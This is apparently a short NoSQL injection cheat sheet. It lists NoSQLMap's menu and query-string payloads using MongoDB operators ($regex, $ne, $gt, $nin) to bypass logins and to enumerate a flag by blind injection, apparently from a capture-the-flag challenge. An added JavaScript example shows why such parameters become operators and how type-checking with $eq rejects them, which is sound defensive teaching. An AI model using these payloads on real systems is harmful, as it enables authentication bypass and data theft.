NOSQL injections

NoSQLMap https://github.com/codingo/NoSQLMap

1-Set options (do this first)
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
x-Exit

Basic Authentication

index.php?login[$regex]=a.*&pass[$ne]=lol
index.php?login[$gt]=admin&login[$lt]=test&pass[$ne]=1

Basic NoSQL Injection

http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto

Blind NoSQL Injection

Get size

index.php?chall_name=nosqlblind&flag[$regex]=.1

Enumeration

index.php?chall_name=nosqlblind&flag[$regex]=3a.20
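
Why the bracketed parameters above reach the database as operators, and a server-side check that rejects them. This is an added example, not part of the original page or of NoSQLMap. The helper names and the `login`/`pass` filter shape are assumptions taken from the query strings on this page.

```javascript
// Added example; parseBracketQuery, unsafeFilter and safeFilter are hypothetical names.

// Parse bracket-notation query strings into nested values, as PHP's $_GET
// and Express's extended query parser do.
function parseBracketQuery(query) {
  const out = Object.create(null); // null prototype: "__proto__" is just a key
  for (const [rawKey, value] of new URLSearchParams(query)) {
    const root = rawKey.split('[')[0];
    const segs = [...rawKey.matchAll(/\[([^\]]*)\]/g)].map((m) => m[1]);
    let node = out;
    let key = root;
    for (const seg of segs) {
      // "[]" appends to an array, "[name]" descends into an object.
      if (typeof node[key] !== 'object') {
        node[key] = seg === '' ? [] : Object.create(null);
      }
      node = node[key];
      key = seg === '' ? node.length : seg;
    }
    node[key] = value;
  }
  return out;
}

// Vulnerable pattern: request values go straight into the MongoDB filter,
// so an object such as {"$ne": "lol"} is interpreted as a query operator.
function unsafeFilter(params) {
  return { login: params.login, pass: params.pass };
}

// Hardened pattern: accept only plain strings and pin them under $eq so the
// value is always compared literally and never read as an operator document.
function safeFilter(params) {
  for (const field of ['login', 'pass']) {
    if (typeof params[field] !== 'string') {
      throw new TypeError(`${field} must be a string`);
    }
  }
  return { login: { $eq: params.login }, pass: { $eq: params.pass } };
}

// Constructed input: the first "Basic Authentication" query string from this page.
const sample = parseBracketQuery('login[$regex]=a.*&pass[$ne]=lol');
console.log(JSON.stringify(unsafeFilter(sample)));
// {"login":{"$regex":"a.*"},"pass":{"$ne":"lol"}}
try { safeFilter(sample); } catch (e) { console.log('rejected:', e.message); }
```

The same type check belongs on JSON request bodies, where an operator object can arrive without any bracket syntax.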
